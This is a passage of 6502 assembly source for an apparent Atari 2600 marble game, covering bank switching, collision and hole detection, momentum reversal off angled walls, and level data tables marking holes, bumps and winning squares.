$0A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A ; 100-81 dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2A dc.b $2B dc.b $2A dc.b $2C dc.b $28 dc.b $31 dc.b $25 dc.b $46 dc.b $04 dc.b $40 dc.b $40 dc.b $50 dc.b $50 ; 120-101 dc.b $54 dc.b $54 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $55 dc.b $56 dc.b $54 dc.b $50 dc.b $50 dc.b $58 dc.b $50 dc.b $50 dc.b $40 dc.b $60 dc.b $40 dc.b $40 ; 140-121 dc.b $00 dc.b $80 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $05 dc.b $25 dc.b $2C dc.b $24 dc.b $24 dc.b $12 dc.b $11 dc.b $09 ; 160-141 dc.b $09 dc.b $05 dc.b $05 dc.b $02 dc.b $01 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $80 ; 180-161 dc.b $80 dc.b $40 dc.b $40 dc.b $20 dc.b $20 dc.b $10 dc.b $50 dc.b $48 dc.b $48 dc.b $68 dc.b $48 dc.b $48 dc.b $10 dc.b $90 dc.b $20 dc.b $20 dc.b $40 dc.b $40 dc.b $80 dc.b $00 ; 200-181 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 dc.b $00 ;============================== ;============================== ORG $CFF6 BANKS_AND_VECTORS ;============================== ;##################################################### ;##################################################### ;##################################################### ;### ### ;### Bank 2 below ### ;### ### ;##################################################### ;##################################################### ;##################################################### ;============ org $D000 ;============ JUMP_TABLE org $D018 rorg $F018 ;================= Bank2Code ;================= ;================== ; BANK 2 organized ;================== ;JSR HandleHole ;JSR HandleCollision ;JSR HandleMusic ;JSR EdgeOfScreenCollisions ; Return to Bank 1 ;LDA #<AfterCollision_InBank1 ;STA ReturnAddress ;LDA #>AfterCollision_InBank1 ;STA ReturnAddress+1 ;JMP Bank1 ;================== ; Check what our table lookup did ; and process it accordingly ;================== LDA CollisionStatusFromTable CMP #WIN BNE NotAWinCondition ; Win condition LDA #2 STA GamePhase IF DEBUG = 1 LDA #$88 STA COLUBK ELSE LDA #$88 STA COLUBK ENDIF JMP ReturntoBank1FromBank2 NotAWinCondition CMP #HOLE BNE NotAHoleCondition ; Service a "fell in hole" situation IF DEBUG = 1 LDA #$48 STA COLUBK ELSE JSR FellInHole ENDIF JMP ReturntoBank1FromBank2 NotAHoleCondition CMP #BUMP BNE NotABumpCondition IF DEBUG = 1 LDA #$28 STA COLUBK ELSE ;JSR SwapMomentum JSR AdjustUsBack ; push us back to before we fell LDA #0 STA Player0SpeedDown STA Player0SpeedUp STA Player0SpeedLeft STA Player0SpeedRight LDA #$80 ; middle value STA Player0VPositionA STA Player0HPositionA LDA #7 STA AUDC0 STA AUDV0 STA AUDF0 ENDIF JMP ReturntoBank1FromBank2 NotABumpCondition LDA #0 STA COLUBK ; Disable sounds, since no collision STA AUDV0 JMP ReturntoBank1FromBank2 ;================= ; Return to Bank 1 ;================= ReturntoBank1FromBank2 LDA #<AfterCollision_InBank1 STA ReturnAddress LDA #>AfterCollision_InBank1 STA ReturnAddress+1 JMP Bank1 ;================= ;================== ; Collision detection ;================== HandleCollision ; We are going to do 4 checks here. ; There is a square that's checked. ; This checks the "upper left corner" LDA Player0HPosition ; initial value 78 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #1 TAX LDA CollisionTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BNE ULCheckTable2 JMP SwapMomentum ULCheckTable2 LDA CollisionTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BNE URCollisionCheck JMP SwapMomentum ; This checks the "upper right corner" URCollisionCheck LDA Player0HPosition ; initial value 78 CLC ADC #4 ; go from bit zero to bit 4 (of 7) LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #1 TAX LDA CollisionTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum LDA CollisionTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum ; This checks the "lower left corner" LDA Player0HPosition ; initial value 78 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #2 TAX LDA CollisionTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum LDA CollisionTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum ; This checks the "lower right corner" LDA Player0HPosition ; initial value 78 CLC ADC #4 ; go from bit zero to bit 4 (of 7) LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #2 TAX LDA CollisionTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum LDA CollisionTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ SwapMomentum ; Disable sounds, since no collision LDA #0 STA AUDV0 JMP CollisionsDone ;================== ;================== ; Second half of above routine. ; Calls subroutines ;================== SwapMomentum ; We have a hit! Play a tone LDA #7 STA AUDC0 STA AUDV0 STA AUDF0 ; Figure out direction to bounce based on piece LDA CollisionByte AND #%11000000 CMP #ANGLE_PIPE BEQ HandleAnglePipe CMP #ANGLE_SLASH BEQ HandleAngleSlash CMP #ANGLE_BACKSLASH BEQ HandleAngleBackslash ; No other situations ; so, fall through to HandleAngleMinus HandleAngleMinus JSR AdjustUsBack JSR SwapMomentumVert JMP CollisionsDone HandleAnglePipe JSR AdjustUsBack JSR SwapMomentumHoriz JMP CollisionsDone HandleAngleSlash JSR AdjustUsBack JSR SwapMomentumSlash JMP CollisionsDone HandleAngleBackslash JSR AdjustUsBack JSR SwapMomentumBackSlash ; TEST CODE ;LDA #0 ;STA Player0SpeedLeft ;STA Player0SpeedRight ;STA Player0SpeedUp ;STA Player0SpeedDown CollisionsDone JSR EdgeOfScreenCollisions ;============== RTS ;============== ;================== ; if we fell in a hole handler ;================== HandleHole ; We are going to do 4 checks here. ; There is a square that's checked. ; This checks the "upper left corner" LDA Player0HPosition ; initial value 78 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #1 TAX LDA HoleTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BNE HoleULCheckTable2 JMP FellInHole HoleULCheckTable2 LDA HoleTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BNE HoleURCollisionCheck JMP FellInHole ; This checks the "upper right corner" HoleURCollisionCheck LDA Player0HPosition ; initial value 78 CLC ADC #4 ; go from bit zero to bit 4 (of 7) LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #1 TAX LDA HoleTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole LDA HoleTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole ; This checks the "lower left corner" LDA Player0HPosition ; initial value 78 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #2 TAX LDA HoleTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole LDA HoleTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole ; This checks the "lower right corner" LDA Player0HPosition ; initial value 78 CLC ADC #4 ; go from bit zero to bit 4 (of 7) LSR LSR ; divide by 4. STA Temp LDA Player0VPosition ; initial value 189 SEC SBC #2 TAX LDA HoleTable1,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole LDA HoleTable2,X ; returns a number. STA CollisionByte AND #%00111111 CMP Temp ; returns a number. BEQ FellInHole ; Disable sounds, since didn't fall in hole LDA #0 STA AUDV0 ;================== RTS ;================== ;================== ; Part of the above, hole handler ;================== FellInHole LDA #1 STA MarbleFallStatus JSR AdjustUsBack ; push us back to before we fell LDA #0 STA Player0SpeedDown STA Player0SpeedUp STA Player0SpeedLeft STA Player0SpeedRight LDA #$80 ; middle value STA Player0VPositionA STA Player0HPositionA ;================== RTS ;================== ;================== ; Music stuff ;================== HandleMusic RTS ;============== ; Swap momentum ;============== SwapMomentumVert LDA Player0SpeedUp BEQ GoingDown GoingUp LDA Player0SpeedUp STA Player0SpeedDown LDA #0 STA Player0SpeedUp DEC Player0VPosition JMP GoingLeftOrRight GoingDown LDA Player0SpeedDown BEQ GoingLeftOrRight LDA Player0SpeedDown STA Player0SpeedUp LDA #0 STA Player0SpeedDown INC Player0VPosition GoingLeftOrRight LDA #$80 ; middle value STA Player0VPositionA RTS ;================== ;================== SwapMomentumHoriz LDA Player0SpeedLeft BEQ GoingRight GoingLeft LDA Player0SpeedLeft STA Player0SpeedRight LDA #0 STA Player0SpeedLeft INC Player0HPosition JMP RegularCollisionsDone GoingRight LDA Player0SpeedRight BEQ RegularCollisionsDone LDA Player0SpeedRight STA Player0SpeedLeft LDA #0 STA Player0SpeedRight DEC Player0HPosition RegularCollisionsDone LDA #$80 ; middle value STA Player0HPositionA RTS ;================== ;================== ; adjust us to go back one space ;================== AdjustUsBack LDA SWCHAStore AND #%00010000 BNE DontAdjustDown DEC Player0VPosition DontAdjustDown LDA SWCHAStore AND #%00100000 BNE DontAdjustUp INC Player0VPosition DontAdjustUp LDA SWCHAStore AND #%01000000 BNE DontAdjustLeft INC Player0HPosition DontAdjustLeft LDA SWCHAStore AND #%10000000 BNE DontAdjustRight DEC Player0HPosition DontAdjustRight RTS ;================== ;================== SwapMomentumSlash LDA Player0SpeedDown STA Temp LDA Player0SpeedLeft STA Player0SpeedDown LDA Temp STA Player0SpeedLeft LDA Player0SpeedUp STA Temp LDA Player0SpeedRight STA Player0SpeedUp LDA Temp STA Player0SpeedRight ;INC Player0HPosition ;DEC Player0HPosition LDA #$80 ; middle value STA Player0HPositionA RTS ;================== ;================== SwapMomentumBackSlash LDA Player0SpeedUp STA Temp LDA Player0SpeedLeft STA Player0SpeedUp LDA Temp STA Player0SpeedLeft LDA Player0SpeedDown STA Temp LDA Player0SpeedRight STA Player0SpeedDown LDA Temp STA Player0SpeedRight ;INC Player0HPosition ;DEC Player0HPosition LDA #$80 ; middle value STA Player0HPositionA RTS ;================== ;================== EdgeOfScreenCollisions ; Edge of screen collisions LDA Player0HPosition ; initial value 78 CMP #16 ; left-hand extrema BEQ LeftEdgeCollision CMP #15 ; just in case BEQ LeftEdgeCollision JMP NoLeftEdgeCollision LeftEdgeCollision ; Swap momentum ;LDA Player0SpeedLeft ;STA Player0SpeedRight LDA #0 STA Player0SpeedLeft LDA #16 STA Player0HPosition JMP NoRightEdgeCollision NoLeftEdgeCollision LDA Player0HPosition ; initial value 78 CMP #136 ; right-hand extrema BEQ RightEdgeCollision CMP #137 ; just in case BEQ RightEdgeCollision JMP NoRightEdgeCollision RightEdgeCollision ; Swap momentum ;LDA Player0SpeedRight ;STA Player0SpeedLeft LDA #0 STA Player0SpeedRight LDA #136 STA Player0HPosition NoRightEdgeCollision RTS ;================== ;============================== ;========== ;ORG $DD00 align 256 ;========== CollisionTable2 HoleTable1 ; 20-1 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 40-21 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 4 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ;============================== ;========== ;ORG $DE00 align 256 ;========== CollisionTable1 ; 20-1 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 40-21 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 7+ANGLE_PIPE dc.b 7+ANGLE_PIPE dc.b 7+ANGLE_SLASH dc.b 8+ANGLE_SLASH dc.b 8+ANGLE_SLASH dc.b 9+ANGLE_SLASH ; 160-141 dc.b 9+ANGLE_SLASH dc.b 10+ANGLE_SLASH dc.b 10+ANGLE_SLASH dc.b 11+ANGLE_SLASH dc.b 12+ANGLE_SLASH dc.b 13+ANGLE_SLASH dc.b 13+ANGLE_SLASH dc.b 14+ANGLE_SLASH dc.b 14+ANGLE_SLASH dc.b 15+ANGLE_SLASH dc.b 15+ANGLE_SLASH dc.b 16+ANGLE_SLASH dc.b 17+ANGLE_SLASH dc.b 18+ANGLE_SLASH dc.b 18+ANGLE_SLASH dc.b 19+ANGLE_SLASH dc.b 20+ANGLE_MINUS dc.b 0 dc.b 4+ANGLE_SLASH dc.b 5+ANGLE_SLASH ; 180-161 dc.b 5+ANGLE_SLASH dc.b 6+ANGLE_SLASH dc.b 6+ANGLE_SLASH dc.b 7+ANGLE_SLASH dc.b 7+ANGLE_SLASH dc.b 8+ANGLE_SLASH dc.b 8+ANGLE_SLASH dc.b 9+ANGLE_SLASH dc.b 9+ANGLE_PIPE dc.b 9+ANGLE_PIPE dc.b 9+ANGLE_PIPE dc.b 9+ANGLE_BACKSLASH dc.b 8+ANGLE_BACKSLASH dc.b 8+ANGLE_BACKSLASH dc.b 7+ANGLE_BACKSLASH dc.b 7+ANGLE_BACKSLASH dc.b 6+ANGLE_BACKSLASH dc.b 6+ANGLE_BACKSLASH dc.b 5+ANGLE_BACKSLASH dc.b 4+ANGLE_BACKSLASH ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ;============================== ;========== ;ORG $DF00 align 256 ;========== HoleTable2 ; 20-1 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 40-21 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 4 dc.b 0 ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 100-81 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 120-101 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 140-121 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 33+ANGLE_BACKSLASH dc.b 33+ANGLE_BACKSLASH dc.b 33+ANGLE_BACKSLASH dc.b 32+ANGLE_BACKSLASH dc.b 32+ANGLE_BACKSLASH dc.b 31+ANGLE_BACKSLASH ; 160-141 dc.b 31+ANGLE_BACKSLASH dc.b 30+ANGLE_BACKSLASH dc.b 30+ANGLE_BACKSLASH dc.b 29+ANGLE_BACKSLASH dc.b 28+ANGLE_BACKSLASH dc.b 27+ANGLE_BACKSLASH dc.b 27+ANGLE_BACKSLASH dc.b 26+ANGLE_BACKSLASH dc.b 26+ANGLE_BACKSLASH dc.b 25+ANGLE_BACKSLASH dc.b 25+ANGLE_BACKSLASH dc.b 24+ANGLE_BACKSLASH dc.b 23+ANGLE_BACKSLASH dc.b 22+ANGLE_BACKSLASH dc.b 22+ANGLE_BACKSLASH dc.b 21+ANGLE_BACKSLASH dc.b 0 dc.b 0 dc.b 0 dc.b 35+ANGLE_BACKSLASH ; 180-161 dc.b 35+ANGLE_BACKSLASH dc.b 34+ANGLE_BACKSLASH dc.b 34+ANGLE_BACKSLASH dc.b 33+ANGLE_BACKSLASH dc.b 33+ANGLE_BACKSLASH dc.b 32+ANGLE_BACKSLASH dc.b 32+ANGLE_BACKSLASH dc.b 31+ANGLE_BACKSLASH dc.b 31+ANGLE_PIPE dc.b 31+ANGLE_PIPE dc.b 31+ANGLE_PIPE dc.b 31+ANGLE_SLASH dc.b 32+ANGLE_SLASH dc.b 32+ANGLE_SLASH dc.b 33+ANGLE_SLASH dc.b 33+ANGLE_SLASH dc.b 34+ANGLE_SLASH dc.b 34+ANGLE_SLASH dc.b 35+ANGLE_SLASH dc.b 0 ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ;============================== ORG $DFF6 BANKS_AND_VECTORS ;============================== ;##################################################### ;##################################################### ;##################################################### ;### ### ;### Bank 3 below ### ;### ### ;##################################################### ;##################################################### ;##################################################### ;============ org $E000 ;============ JUMP_TABLE org $E018 rorg $F018 ;================= Bank3Code ;================= ; New constants FLAT = %00000000 BUMP = %00000001 HOLE = %00000010 WIN = %00000011 ; Set to a default value LDA #$FF STA CollisionStatusFromTable LDA Player0HPosition ; initial value 78 SEC SBC #16 CLC ADC #3 ; go from bit zero to bit 3 (of 7). LSR LSR ; divide by 4. TAX ; number is 0-31 ; If 0-15, do in this bank ; If 16-31, do in next bank CMP #16 BPL GotoBank4FromBank3 ; Ok, if we fell through to here, we're doing a lookup LDA ProcessTableLSBBank3,X STA ReturnAddress LDA ProcessTableMSBBank3,X STA ReturnAddress+1 ; Get the line LDA Player0VPosition ; initial value 189 SEC IF DEBUG = 1 SBC #1 ELSE SBC #3 ENDIF TAY LDA (ReturnAddress),Y ;=========== BNE FinishedProcessingBank3 ; otherwise, check if we're an edge-case LDA Player0HPosition ; initial value 78 SEC SBC #16 CLC ADC #4 ; go from bit zero to bit 4 (of 7). LSR LSR ; divide by 4. TAX ; number is 0-31 ; If 0-15, do in this bank ; If 16-31, do in next bank CMP #16 BPL GotoBank4FromBank3 ; number is 0-15 for bank4 checks LDA ProcessTableLSBBank3,X STA ReturnAddress LDA ProcessTableMSBBank3,X STA ReturnAddress+1 ; Get the line LDA Player0VPosition ; initial value 189 SEC IF DEBUG = 1 SBC #1 ELSE SBC #3 ENDIF TAY LDA (ReturnAddress),Y FinishedProcessingBank3 ;=========== STA CollisionStatusFromTable JMP Bank2 ;================= ; Test Bank 4 ;================= GotoBank4FromBank3 JMP Bank4 ;================= ProcessTableLSBBank3 ; 1-8 .byte #<Column1Information .byte #<Column2Information .byte #<Column3Information .byte #<Column4Information .byte #<Column5Information .byte #<Column6Information .byte #<Column7Information .byte #<Column8Information ; 9-16 .byte #<Column9Information .byte #<Column10Information .byte #<Column11Information .byte #<Column12Information .byte #<Column13Information .byte #<Column14Information .byte #<Column15Information .byte #<Column16Information ProcessTableMSBBank3 ; 1-8 .byte #>Column1Information .byte #>Column2Information .byte #>Column3Information .byte #>Column4Information .byte #>Column5Information .byte #>Column6Information .byte #>Column7Information .byte #>Column8Information ; 9-16 .byte #>Column9Information .byte #>Column10Information .byte #>Column11Information .byte #>Column12Information .byte #>Column13Information .byte #>Column14Information .byte #>Column15Information .byte #>Column16Information ;================================= ; Column Information organization ;================================= ; Conditions handled (LSB): ; Nothing = %0000 ; Bump = %0001 ; Hole = %0010 ; Winning space = %0011 ; 8 angles ; Conditions handled (MSB): ; Slope = 0-15 ; Slope = UR/UL/DL/DR bump ;================== ; New constants ;FLAT = %00000000 ;BUMP = %00000001 ;HOLE = %00000010 ;WIN = %00000011 Column1Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE ; 60-41 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 80-61 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 100-81 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b BUMP dc.b BUMP dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 120-101 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 140-121 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 160-141 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 ; 180-161 dc.b 0 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP ; 200-181 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b HOLE Column2Information ; 20-1 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE ; 40-21 dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b HOLE dc.b BUMP dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b WIN dc.b BUMP dc.b HOLE dc.b HOLE ; 60-41 dc.b HOLE dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 dc.b 0 